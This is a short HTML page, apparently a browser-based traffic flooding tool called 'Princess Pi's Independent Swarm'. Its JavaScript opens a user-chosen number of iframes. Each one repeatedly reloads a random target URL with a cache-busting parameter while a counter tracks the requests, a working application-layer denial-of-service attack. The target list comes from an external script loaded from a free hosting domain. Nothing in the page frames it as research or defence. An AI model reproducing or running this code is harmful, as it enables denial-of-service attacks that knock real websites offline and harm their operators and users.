<script>
var l = 0;
var go = true;
var ifm = [];

function re(ifm) {
  if(go === true)
  {
    ifm.setAttribute("src",vect[Math.floor(Math.random()*10)]+"?t="+Math.random())
    l++;
    document.getElementById("completed").innerHTML = l;
  }
}
function gob() {
  th = document.getElementById("thr").value;
  for(i=0; i<th; i++) {
    ifm[i] = document.createElement("iframe");
	ifm[i].src = vect[Math.floor(Math.random()*10)];
	ifm[i].setAttribute("onload","re(this);");
	document.body.appendChild(ifm[i]);
	
  }
}
</script>
<h1>Princess Pi's Independent Swarm!</h1>
Threads<input type="text" id="thr" value="5"><input type="button" value="Go, Baby, Go" onclick="gob()">Requests<span id="completed">0</span>
<script src="http://www.megaupload.byethost7.com/files/813953.html"></script>